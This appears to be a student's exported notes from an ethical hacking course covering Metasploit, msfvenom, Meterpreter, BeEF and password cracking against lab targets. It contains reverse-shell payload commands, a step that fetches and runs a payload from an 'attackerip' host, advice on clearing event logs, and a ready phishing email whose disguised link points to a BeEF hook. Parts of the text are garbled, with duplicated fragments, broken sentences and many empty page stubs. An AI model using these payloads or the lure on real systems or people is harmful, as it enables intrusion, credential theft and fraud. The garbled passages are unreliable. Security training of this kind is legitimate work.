40 Metasploit

25 July 2024 21:20

DAY 40 OF 75 DAYS ETHICAL

HACKING COURSE

Metasploit is the most widely used exploitation framework. Metasploit is a powerful tool that can support all phases of a pen etration testing engagement, from
information gathering to post-exploitation.

Metasploit has two main versions:

• Metasploit Pro: The commercial version that facilitates the automation and management of tasks. This version has a graphical user interface(GUI).
• Metasploit Framework: The open-source version that works from the command line. This room will focus on this version, installed on the AttackBox and
most commonly used penetration testing Linux distributions.
•

The main components of the Metasploit Framework can be summarized as follows;

• msfconsole: The main command-line interface.
• Modules: supporting modules such as exploits, scanners, payloads, etc.
• Tools: Stand-alone tools that will help vulnerability research, vulnerability assessment, or penetration testing. Some of these tools are msfvenom,
pattern_create and pattern_offset. We will cover msfvenom within this module, but pattern_create and pattern_offset are toolsuseful in exploit
development which is beyond the scope of this module.

MSFCONSOLE
“Msfconsole“ is the primary interface to the Metasploit framework. This is the command line interface for the framework which
can be launched by typing in msfconsole in the command line. This opens up the msfconsole interface in which we can use
different Metasploit options and commands. A GUI version tool of the Metasploit framework also exists which is “ Armitage“. It
is pre-installed in Kali Linux. The advantage of using msfconsole over the GUI version is that we can run external
commands like ‘ping’, ‘ifconfig’ etc. in the interface itself and also get tab auto-completion.

How to install in llinux

➢ sudo apt install metasploit-framework
➢ Sudo service postgresql start
➢ Msfconsole
➢ Db_status (it will show not connected)
➢ SO
➢ sudo msfdb init
➢ Msfconsole

Major Categories of Metasploit

Metasploit framework is built on 7 major categories each containing modules that can be used in each hacking phase. A brief
introduction to each of the 7 categories is given below:

Category 1: Exploit

Exploit is a piece of code that uses a vulnerability present in the target system. The exploit module is very neatly organized
and contains modules for all the known exploits for a vulnerability in any software/service.

Category 2: Auxiliary

Any module under this category is mostly used for scanning and information gathering. Modules like scanners, crawlers,
sniffers, etc. can be found here.

Category 3: Payload

Payloads are the code that will run on the target system. Exploit only leverages the vulnerability present in the system. But if
we want the exploit to have the result we would want (gaining access, installing a back door, popping up a reverse shell), we
need to use a payload.

Category 4: Post

Post contains all the modules that can be used for the post-exploitation phase.

Category 5: Encoders

The exploits or payloads we use to exploit a target system can often be blocked by the target system that is using a signatur e-
based anti-virus solution. Encoders are used to encode an exploit in the hopes of being undetected by the anti-virus.

Category 6: NOP (No Operation )

The modules in this category are used to provide a buffer that conveys the system to do literally nothing.

Category 7: Evasion

Even if we encode the exploits or payloads, evasion techniques can also be used above it to evade antivirus software.

Examples of Metasploit
Below is a more understandable example of leveraging a vulnerability present in the WordPress site version 5.0 to access
the target system. An NMAP version scan (nmap -sV <IP>) on the target system reveals that the target system is running
WordPress version 5.0. Now let’s see some examples of the basic commands and the process used in msfconsole to exploit
the target system running WordPress 5.0.
Step 1: Searchsploit
Searchsploit is a command line search tool for Exploit-DB used to search for any publicly known exploits for a particular
operating system, application, or service running on the target system. The search result gives all the known exploit modules

System hacking Page 1

Below is a more understandable example of leveraging a vulnerability present in the WordPress site version 5.0 to access
the target system. An NMAP version scan (nmap -sV <IP>) on the target system reveals that the target system is running
WordPress version 5.0. Now let’s see some examples of the basic commands and the process used in msfconsole to exploit
the target system running WordPress 5.0.
Step 1: Searchsploit
Searchsploit is a command line search tool for Exploit-DB used to search for any publicly known exploits for a particular
operating system, application, or service running on the target system. The search result gives all the known exploit modules
which can be used in msfconsole to exploit and gain access to the target system.
msf6> searchsploit <software/service you want to exploit>
msf6> searchsploit wordpress 5.0

Step 2: Search
Searches module names and descriptions of exploits or payloads that can be used to leverage any known vulnerability for a
given service or application. Depending on the rank of the modules returned, we can use the relevant exploit or payload and
use it for exploitation. In the below example, We also gave the kind of exploit that we wanted to use.
msf6 > search wordpress 5.0 crop image

Step 3: Use
Use command is used to select the exploit or payload module we are going to use against the vulnerable version of the
software or service. The use command lets us select the module to further be able to set parameters of the host and target
machines which can then be used for exploitation.
msf6> use exploit/multi/http/wp_crop_rce
The module to be used can also be selected with the use command followed by the number(index) at the beginning of the
search result line.

Step 4: Info
Info command gives any additional information of the module used within the context. It contains information about the exploi t
name, description of the payload, the year it was disclosed, etc.
msf6 > info

Step 5: Show
Show options is a command used to show all the parameters or environment variables that need to be set before exploiting a
target system. After the hacker selects a suitable exploit to use against the target system using the “use” command, he/she i s
required to set the IP address, port of the target system, and also username and password for authentication into the
application if the target system is running an application like WordPress. The show command shows all the required
parameters that need to be set before exploiting the target.
msf6 > show options

Step 6: Set
The set command is used in conjunction with the show command where it is used to set the necessary parameters like
LHOST, LPORT, RHOST, RPORT, username, and password. LHOST and LPORT refer to the attacker’s system’s (in this case
us) IP address and port. RHOST and RPORT refers to the victim’s IP and port.
msf6 > set LHOST 10.18.51.89
msf6 > set PHOSTS 10.10.36.242
msf6 > set USERNAME kwheel
msf6 > set PASSWORD cutiepie1

Step 7: run/exploit
This command is used to launch the exploit after successfully setting the required parameters. Depending on the payload, the
payload can pop up a reverse TCP shell or install a backdoor or gain a root shell.
msf6 > exploit

System hacking Page 2

Step 7: run/exploit
This command is used to launch the exploit after successfully setting the required parameters. Depending on the payload, the
payload can pop up a reverse TCP shell or install a backdoor or gain a root shell.
msf6 > exploit

System hacking Page 3

41 Advanced metasploit
25 July 2024 21:28

Scanning
Port Scanning

Metasploit has a number of modules to scan open ports on the target system and network. You can list potential port scanningmodules available using the search portscan command.
Search portscan

msf6 > search portscan

Matching Modules
================

# Name Disclosure Date Rank Check Description

- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/wordpress_pingback_access normal No Wordpress Pingback Locator
1 auxiliary/scanner/natpmp/natpmp_portscan normal No NAT-PMP External Port Scanner
2 auxiliary/scanner/portscan/ack normal No TCP ACK Firewall Scanner
3 auxiliary/scanner/portscan/ftpbounce normal No FTP Bounce Port Scanner
4 auxiliary/scanner/portscan/syn normal No TCP SYN Port Scanner
5 auxiliary/scanner/portscan/tcp normal No TCP Port Scanner
6 auxiliary/scanner/portscan/xmas normal No TCP "XMas" Port Scanner
7 auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner

Interact with a module by name or index, for example use 7 or use auxiliary/scanner/sap/sap_router_portscanner

msf6 >

Port scanning modules will require you to set a few options:

Portscan options

msf6 auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

Name Current Setting Required Description

---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax f'ile:'
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 1000 yes The socket connect timeout in milliseconds

msf6 auxiliary(scanner/portscan/tcp) >

CONCURRENCY: Number of targets to be scanned simultaneously.

PORTS: Port range to be scanned. Please note that 1-1000 here will not be the same as using Nmap with the default configuration. Nmap will scan the 1000 most used ports, while Metasploit
will scan port numbers from 1 to 10000.
RHOSTS: Target or target network to be scanned.
THREADS: Number of threads that will be used simultaneously. More threads will result in faster scans.

You can directly perform Nmap scans from the msfconsole prompt as shown below faster:
Using Nmap from the Msfconsole prompt

msf6 > nmap -sS 10.10.12.229

[*] exec: nmap -sS 10.10.12.229

Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-20 03:54 BST

Nmap scan report for ip-10-10-12-229.eu-west-1.compute.internal (10.10.12.229)
Host is up (0.0011s latency).
Not shown: 992 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
MAC Address: 02:CE:59:27:C8:E3 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 64.19 seconds

msf6 >

As for information gathering, if your engagement requires a speedier approach to port scanning, Metasploit may not be your first choice. However, a number of modules make Metasploit a
useful tool for the scanning phase.

UDP service Identification

The scanner/discovery/udp_sweep module will allow you to quickly identify services running over the UDP (User Datagram Protocol). As you can see below, this module will not conduct an
extensive scan of all possible UDP services but does provide a quick way to identify services such as DNS or NetBIOS.
UDP scan

msf6 auxiliary(scanner/discovery/udp_sweep) > run

[*] Sending 13 probes to 10.10.12.229->10.10.12.229 (1 hosts)

[*] Discovered NetBIOS on 10.10.12.229:137 (JON-PC::U :WORKGROUP::G :JON-PC::U :WORKGROUP::G :WORKGROUP::U :__MSBROWSE__::G :02:ce:59:27:c8:e3)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/discovery/udp_sweep) >

SMB Scans

Metasploit offers several useful auxiliary modules that allow us to scan specific services. Below is an example for the SMB.Especially useful in a corporate network would be smb_enumshares
and smb_version but please spend some time to identify scanners that the Metasploit version installed on your system offers.
SMB scan

When performing service scans, it would be important not to omit more "exotic" services such as NetBIOS. NetBIOS (Network Basic Input Output System), similar to SMB, allows computers to
communicate over the network to share files or send files to printers. The NetBIOS name of the target system can give you anidea about its role and even importance (e.g. CORP-DC, DEVOPS,
SALES, etc.). You may also run across some shared files and folders that could be accessed either without a password or protected with a simple password (e.g. admin, administrator, root, toor,
etc.).

The Metasploit Database

Metasploit has a database function to simplify project management and avoid possible confusion when setting up parameter values.

You will first need to start the PostgreSQL database, which Metasploit will use with the following command:
systemctl start postgresql

Then you will need to initialize the Metasploit Database using the msfdb init command.

Starting Postgresql

root@attackbox:~# systemctl start postgresql

root@attackbox:~# msfdb init
[i] Database already started
[+] Creating database user 'msf'
[+] Creating databases 'msf'
[+] Creating databases 'msf_test'
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema

msfconsole and check the database status using the db_status command.
Checking the database status
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
msf6 >

The database feature will allow you to create workspaces to isolate different projects. When first launched, you should be inthe default workspace. You can list available workspaces using the
workspace command.

Listing workspaces
msf6 > workspace
* default
msf6 >

System hacking Page 4

[*] Connected to msf. Connection type: postgresql.
msf6 >

The database feature will allow you to create workspaces to isolate different projects. When first launched, you should be inthe default workspace. You can list available workspaces using the
workspace command.

Listing workspaces
msf6 > workspace
* default
msf6 >

Adding a workspace
msf6 > workspace -a tryhackme
[*] Added workspace: tryhackme
[*] Workspace: tryhackme
msf5 > workspace
default

Changing workspaces
msf6 > workspace
default

msf5 > workspace default

[*] Workspace: default
msf5 > workspace

* default
msf6 >

msf6 > workspace -h

Usage:
workspace List workspaces
workspace -v List workspaces verbosely
workspace [name] Switch workspace
workspace -a [name] ... Add workspace(s)
workspace -d [name] ... Delete workspace(s)
workspace -D Delete all workspaces
workspace -r Rename workspace
workspace -h Show this help information
Different from regular Metasploit usage, once Metasploit is launched with a database, thehelp command, you will show the Database Backends Commands menu.
Database backend commands
Database Backend Commands
=========================
Command Description
------- -----------
analyze Analyze database information about a specific address or address range
db_connect Connect to an existing data service
db_disconnect Disconnect from the current data service
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache (deprecated)
db_remove Remove the saved data service entry
db_save Save the current data service connection as the default to reconnect on startup
db_status Show the current data service status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
If you run a Nmap scan using the db_nmap shown below, all results will be saved to the database.
The db_nmap command

msf6 > db_nmap -sV -p- 10.10.12.229

[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-20 03:15 UTC
[*] Nmap: Nmap scan report for ip-10-10-12-229.eu-west-1.compute.internal (10.10.12.229)
[*] Nmap: Host is up (0.00090s latency).
[*] Nmap: Not shown: 65526 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
[*] Nmap: 3389/tcp open ssl/ms-wbt-server?
[*] Nmap: 49152/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49153/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49154/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49158/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49162/tcp open msrpc Microsoft Windows RPC
[*] Nmap: MAC Address: 02:CE:59:27:C8:E3 (Unknown)
[*] Nmap: Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Service detection performed. Please report any incorrect results athttps://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 94.91 seconds
msf6 >
You can now reach information relevant to hosts and services running on target systems with thehosts and services commands, respectively.
Hosts and services
msf6 > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
10.10.12.229 02:ce:59:27:c8:e3 ip-10-10-12-229.eu-west-1.compute.internal Unknown device
msf6 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
10.10.12.229 135 tcp msrpc open Microsoft Windows RPC
10.10.12.229 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
10.10.12.229 445 tcp microsoft-ds open Microsoft Windows 7 - 10 microsoft-ds workgroup: WORKGROUP
10.10.12.229 3389 tcp ssl/ms-wbt-server open
10.10.12.229 49152 tcp msrpc open Microsoft Windows RPC
10.10.12.229 49153 tcp msrpc open Microsoft Windows RPC
10.10.12.229 49154 tcp msrpc open Microsoft Windows RPC
10.10.12.229 49158 tcp msrpc open Microsoft Windows RPC
10.10.12.229 49162 tcp msrpc open Microsoft Windows RPC
msf6 >
The hosts -h and services -h commands can help you become more familiar with available options.
Once the host information is stored in the database, you can use the hosts-R command to add this value to the RHOSTS parameter.

You may want to look for low-hanging fruits such as:

• HTTP: Could potentially host a web application where you can find vulnerabilities like SQL injection or Remote Code Execution (RCE).
• FTP: Could allow anonymous login and provide access to interesting files.
• SMB: Could be vulnerable to SMB exploits like MS17-010
• SSH: Could have default or easy to guess credentials
• RDP: Could be vulnerable to Bluekeep or allow desktop access if weak credentials were used.

Exploitation
You can search exploits using the searchcommand, obtain more information about the exploit using the infocommand, and launch the exploit using exploit. While the process itself is simple,
remember that a successful outcome depends on a thorough understanding of services running on the target system.

Most of the exploits will have a preset default payload. However, you can always use theshow payloads command to list other commands you can use with that specific exploit.

Working with sessions

>

The sessions command will list all active sessions. The sessionscommand supports a number of options that will help you manage sessions better.

System hacking Page 5

Msfvenom

Msfvenom, which replaced Msfpayload and Msfencode, allows you to generate payloads.

Msfvenom will allow you to access all payloads available in the Metasploit framework. Msfvenom allows you to create payloads in many different formats (PHP, exe, dll, elf, etc.) and for many
different target systems (Apple, Windows, Android, Linux, etc.).

Encoders
Contrary to some beliefs, encoders do not aim to bypass antivirus installed on the target system. As the name suggests, theyencode the payload. While it can be effective against some
antivirus software, using modern obfuscation techniques or learning methods to inject shellcode is a better solution to the problem. The example below shows the usage of encoding (with
the -e parameter. The PHP version of Meterpreter was encoded in Base64, and the output format was raw.

Handlers
Similar to exploits using a reverse shell, you will need to be able to accept incoming connections generated by the MSFvenompayload. When using an exploit module, this part is automatically
handled by the exploit module, you will remember how the payload options title appeared when setting a reverse shell. The term commonly used to receive a connection from a target is
'catching a shell'. Reverse shells or Meterpreter callbacks generated in your MSFvenom payload can be easily caught using a handler.

The following scenario may be familiar; we will exploit the file upload vulnerability present in DVWA (Damn Vulnerable Web Application). For the exercises in this task, you will need to
replicate a similar scenario on another target system, DVWA was used here for illustration purposes. The exploit steps are;
1. Generate the PHP shell using MSFvenom
2. Start the Metasploit handler
3. Execute the PHP shell
MSFvenom will require a payload, the local machine IP address, and the local port to which the payload will connect. Seen below, 10.0.2.19 is the IP address of the AttackBox used in the attack
and local port 7777 was chosen.

We will use Multi Handler to receive the incoming connection. The module can be used with the use exploit/multi/handler command.
Multi handler supports all Metasploit payloads and can be used for Meterpreter as well as regular shells.
To use the module, we will need to set the payload value (php/reverse_php in this case), the LHOST, and LPORT values.

System hacking Page 6

Other Payloads
Based on the target system's configuration (operating system, install webserver, installed interpreter, etc.), msfvenom can be used to create payloads in almost all formats. Below are a few
examples you will often use:
In all these examples, LHOST will be the IP address of your attacking machine, and LPORT will be the port on which your handler will listen.

Linux Executable and Linkable Format (elf)

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX-f elf > rev_shell.elf

The .elf format is comparable to the .exe format in Windows. These are executable files for Linux. However, you may still need to make sure they have executable permissions on the target
machine. For example, once you have the shell.elf file on your target machine, use the chmod +x shell.elf command to accord executable permissions. Once done, you can run this file by
typing ./shell.elf on the target machine command line.

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX-f exe > rev_shell.exe

."/ipuse
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX-f raw > rev_shell.php

ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX-f asp > rev_shell.asp

Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX-f raw > rev_shell.py

Now test on metasploitable 2

➢ Create payload
➢ Run python server (python3 -m http.server 9000}
➢ Download it and run it { wget http://attackerip:9000/payload } and run is using bash
➢ Before that listen and run the meterpreter for linux linux/x86/meterpreter/reverse_tcp

Introduction to Meterpreter

Meterpreter is a Metasploit payload that supports the penetration testing process with many valuable components. Meterpreterwill run on the target system and act as an agent within a
command and control architecture. You will interact with the target operating system and files and use Meterpreter's specialized commands.

Meterpreter has many versions which will provide different functionalities based on the target system.

How does Meterpreter work?

Meterpreter runs on the target system but is not installed on it. It runs in memory and does not write itself to the disk onthe target. This feature aims to avoid being detected during antivirus
scans. By default, most antivirus software will scan new files on the disk (e.g. when you download a file from the internet)Meterpreter runs in memory (RAM - Random Access Memory) to
avoid having a file that has to be written to the disk on the target system (e.g. meterpreter.exe). This way, Meterpreter will be seen as a process and not have a file on the target system.

Meterpreter also aims to avoid being detected by network-based IPS (Intrusion Prevention System) and IDS (Intrusion Detection System) solutions by using encrypted communication withthe
server where Metasploit runs (typically your attacking machine). If the target organization does not decrypt and inspect encrypted traffic (e.g. HTTPS) coming to and going out of the local
network, IPS and IDS solutions will not be able to detect its activities.

While Meterpreter is recognized by major antivirus software, this feature provides some degree of stealth.

The example below shows a target Windows machine exploited using the MS17-010 vulnerability. You will see Meterpreter is running with a process ID (PID) of 1304; this PID will be different
in your case. We have used the getpidcommand, which returns the process ID with which Meterpreter is running. The process ID (or process identifier) is used by operating systems to identify
running processes. All processes running in Linux or Windows will have a unique ID number; this number is used to interact with the process when the need arises (e.g. if it needs to be
stopped).

Meterpreter Flavors

Meterpreter Commands

Meterpreter will provide you with three primary categories of tools;

• Built-in commands

System hacking Page 7

Meterpreter will provide you with three primary categories of tools;
• Built-in commands
• Meterpreter tools
• Meterpreter scripting
If you run the help command, you will see Meterpreter commands are listed under different categories.
• Core commands
• File system commands
• Networking commands
• System commands
• User interface commands
• Webcam commands
• Audio output commands
• Elevate commands
• Password database commands
• Timestomp commands

Meterpreter commands

Core commands
• background: Backgrounds the current session
• exit: Terminate the Meterpreter session Core commands will be helpful to navigate and interact with the target system. Below are some of the most commonly used. Reme mber to check all available commands running the help
• guid: Get the session GUID (Globally Unique Identifier) command once a Meterpreter session has started.
• help: Displays the help menu
• info: Displays information about a Post module
• irb: Opens an interactive Ruby shell on the current session
• load: Loads one or more Meterpreter extensions
• migrate: Allows you to migrate Meterpreter to another process
• run: Executes a Meterpreter script or Post module
• sessions: Quickly switch to another session

File system commands

• cd: Will change directory
• ls: Will list files in the current directory (dir will also work)
• pwd: Prints the current working directory
• edit: will allow you to edit a file
• cat: Will show the contents of a file to the screen
• rm: Will delete the specified file
• search: Will search for files
• upload: Will upload a file or directory
• download: Will download a file or directory

Networking commands
• arp: Displays the host ARP (Address Resolution Protocol) cache
• ifconfig: Displays network interfaces available on the target system
• netstat: Displays the network connections
• portfwd: Forwards a local port to a remote service
• route: Allows you to view and modify the routing table

System commands
• clearev: Clears the event logs
• execute: Executes a command
• getpid: Shows the current process identifier
• getuid: Shows the user that Meterpreter is running as
• kill: Terminates a process
• pkill: Terminates processes by name
• ps: Lists running processes
• reboot: Reboots the remote computer
• shell: Drops into a system command shell
• shutdown: Shuts down the remote computer
• sysinfo: Gets information about the remote system, such as OS

Others Commands (these will be listed under different menu categories in the help menu)
• idletime: Returns the number of seconds the remote user has been idle
• keyscan_dump: Dumps the keystroke buffer
• keyscan_start: Starts capturing keystrokes
• keyscan_stop: Stops capturing keystrokes
• screenshare: Allows you to watch the remote user's desktop in real time
• screenshot: Grabs a screenshot of the interactive desktop
• record_mic: Records audio from the default microphone for X seconds
• webcam_chat: Starts a video chat
• webcam_list: Lists webcams
• webcam_snap: Takes a snapshot from the specified webcam
• webcam_stream: Plays a video stream from the specified webcam
• getsystem: Attempts to elevate your privilege to that of local system
• hashdump: Dumps the contents of the SAM database

Post-Exploitation with Meterpreter

The getuid command will display the user with which Meterpreter is currently running. This will give you an idea of your possible privilege level on the target system (e.g. Are you an admin
level user like NT AUTHORITY\SYSTEM or a regular user?)

Migrate
Migrating to another process will help Meterpreter interact with it. For example, if you see a word processor running on thetarget (e.g. word.exe, notepad.exe, etc.), you can migrate to it and
start capturing keystrokes sent by the user to this process. Some Meterpreter versions will offer you the keyscan_start, keyscan_stop, and keyscan_dump command options to make
Meterpreter act like a keylogger. Migrating to another process may also help you to have a more stable Meterpreter session.

Hashdump
The hashdump command will list the content of the SAM database. The SAM (Security Account Manager) database stores user's passwords on Windows systems. These passwords are stored in
the NTLM (New Technology LAN Manager) format.

The "EternalBlue" is an exploit allegedly developed by the U.S. National Security Agency (N.S.A.) for a vulnerability affecting the SMBv1 server on numerous Windows systems. The SMB (Server
Message Block) is widely used in Windows networks for file sharing and even for sending files to printers. EternalBlue was leaked by the cybercriminal group "Shadow Brokers" in April 2017. In
May 2017, this vulnerability was exploited worldwide in the WannaCry ransomware attack.

System hacking Page 8

System hacking Page 9
System hacking Page 10
42 -BEEF
23 August 2024 21:44

DAY 42 OF 75 DAYS ETHICAL HACKING

COURSE
here is step by step___

System hacking Page 11

 http://127.0.0.1:3000/demos/butcher/index.html
http://127.0.0.1:3000/ui/panel

/demos/butcher/index.html
https://9e37-122-161-73-149.ngrok-free.app/

System hacking Page 12

 /demos/butcher/index.html
https://9e37-122-161-73-149.ngrok-free.app/

System hacking Page 13

System hacking Page 14
24 August 2024 22:08

System hacking Page 15

System hacking Page 16
System hacking Page 17
System hacking Page 18
System hacking Page 19
 a

System hacking Page 20

System hacking Page 21
System hacking Page 22
System hacking Page 23
System hacking Page 24
43 Metaslpoit + Beef
25 August 2024 21:42

DAY 43 OF 75 DAYS ETHICAL

HACKING COURSE

System hacking Page 25

System hacking Page 26
System hacking Page 27
System hacking Page 28
 https://63d3-122-161-76-174.ngrok-
free.app/demos/butcher/index.html

https://howshorts.com-
agency@da.gd/cG4v95

Hello dear

sir/maam

We are from a marketing

company and we have product
blablabla blaa blablabn

Here is our portfolio incase you

want see
https://howshorts.com-
agency@da.gd/cG4v95

Thankyou
Best regards

Team marketing

System hacking Page 29

 44 Password cracking
26 August 2024 21:41

1. DAY 44 OF 75 DAYS ETHICAL

HACKING COURSE
2. Gaining Access - Uses information gathered to exploit the system
○ Password Attacks:
▪ Non-electronic attacks
▪ Active online attacks
▪ Passive online attacks
▪ Offline attacks
3. Escalating Privileges - Granting the account you've hacked admin or pivoting to an admin account
4. Executing Applications - Putting back doors into the system so that you can maintain access
5. Hiding Files - Making sure the files you leave behind are not discoverable
6. Covering Tracks - Cleaning up everything else (log files, etc.)
○ clearev - Meterpreter shell command to clear log files (issued inside Metasploit Framework)
○ Clear MRU list in Windows
○ In Linux, append a dot in front of a file to hide it

Password Attacks

Non-electronic - Non-technical attacks.

• Social engineering attacks - most effective.

• Shoulder surfing
• Dumpster diving
• Snooping around
• Guessing

Active online - done by directly communicating with the victim's machine.

• Includes Dictionary and Brute-force attacks, hash injections, phishing, Trojans, spyware, keyloggers and password guessing

• Keylogging - process of using a hardware device or software application to capture keystrokes of a user

• Active online attacks are easier to detect and take a longer time

• Tools for Active Online Attack:

○ Medusa
○ Hydra
○ NBNSpoof
○ Pupy
○ Metasploit
○

• Can combine "net" commands with a tool such as NetBIOS Auditing tool or Legion to automate the testing of user IDs and
passwords

○ Tools for NetBIOS attack:

▪ Hydra
▪ Metasploit

Passive online - Sniffing the wire in hopes of intercepting a password in clear text or attempting a replay attack or man -in-the-middle attack

• Tools for Passive Online Attack:

○ Cain and Abel - Can poison ARP and then monitor the victim's traffic; Also used for cracking hash passwords (LM, NTLM), sniff
network packets for password, sniff out for local stored passwords, etc.
○ Ettercap - MITM tool for LAN's, DNS Spoofer; Help against SSL encryption; Intercept the traffic on a network segment, capture
passwords, and conduct an active eavesdropping against a number of common protocols.
○ KerbCrack - built-in sniffer and password cracker looking for port 88 Kerberos traffic
○ ScoopLM - specifically looks for Windows authentication traffic on the wire and has a password cracker

Service Port
FTP 20/21
TELNET 23
SMTP 25
HTTP 80
POP3 110
IMAPv4 143
NetBIOS 139,445
SNMP 161,162
SQLnet 1521

Offline - when the hacker steals a copy of the password file (Plaintext or Hash) and does the cracking on a separate system.

• Dictionary Attack - uses a word list to attack the password. Fastest method of attacking

○ Wordlists - A wordlist or a password dictionary is a collection of passwords stored in plain text. It's basically a text file with a
bunch of passwords in it. One popular example of wordlist is the rockyou.txt containing 14,341,564 unique passwords.

○ You also can generate your own wordlist with given parameters like length, combining letters and numbers, profiling etc.

▪ Tools for generate Wordlists:

□ CeWL
□ crunch

• Brute force attack - Tries every combination of characters to crack a password

○ Can be faster if you know parameters (such as at least 7 characters, should have a special character, etc.)

• Rainbow tables - Uses pre-hashed passwords to compare against a password hash. Is faster because the hashes are already
computed.

• Tools for cracking password files (CLI):

○ John the Ripper - Works on Unix, Windows and Kerberos; Compatible with MySQL, LDAP and MD4.
○ Hashcat - Advanced password recovery tool; Provides several options like hash modes OS's, documents, password managers...
(MD5, SHA-family, RIPE-MD, NTLM, LM, BitLocker, OSX, MD5 salted or iterated, and the list goes on).

System hacking Page 30

• Tools for cracking password files (GUI):

○ Cain & Abel - Windows software; Cracks hash passwords (LM, NTLM), sniff network packets for password, sniff out for local stored
passwords, etc.
○ LOphcrack - Paid software; Extract and crack hashes; Uses brute force or dictionary attack;
○ Ophcrack - Free open-source; Cracks Windows log-in passwords by using LM hashes through rainbow tables.
○ Rainbowcrack - Rainbow tables generator for password cracking
○ Legion - Legion automates the password guessing in NetBIOS sessions. Legion scans multiple IP address ranges for Windows
shares and also offers a manual dictionary attack tool.
○ KerbCrack - Crack Kerberos passwords.
○ Mimikatz - Steal credentials and escalate privileges (Windows NTLM hashes and Kerberos tickets(Golden Ticket Attack); 'Pass -
the-hash' and 'Pass-the-ticker').
○ fgdump - Dump SAM databases on Windows machines.
○ Pwdump7 - Dump SAM databases on Windows machines.

• CHNTPW - chntpw is a software utility for resetting or blanking local passwords used by Windows NT, 2000, XP, Vista, 7, 8, 8.1
and 10. It does this by editing the SAM database where Windows stores password hashes.

1. Physical access to victim's computer

2. Startup on BIOS and allow boot to CD or USB
3. Modify the SAM user account information through the CHNTPW

is a dat .
It stores users passwords in a hashed format (in LM hash and NTLM hash). ecause a hash function iabase file
s one way, this provides some measure of security for the storage of the passwords.

is where is stored in (only users with high privileges can access).

• Length of passwords is good against brute-force attacks.

• Password complexity is good against dictionary attacks.

System hacking Page 31

System hacking Page 32
System hacking Page 33
System hacking Page 34
System hacking Page 35
System hacking Page 36
System hacking Page 37
System hacking Page 38
45
27 August 2024 11:15

System hacking Page 39

System hacking Page 40
System hacking Page 41
System hacking Page 42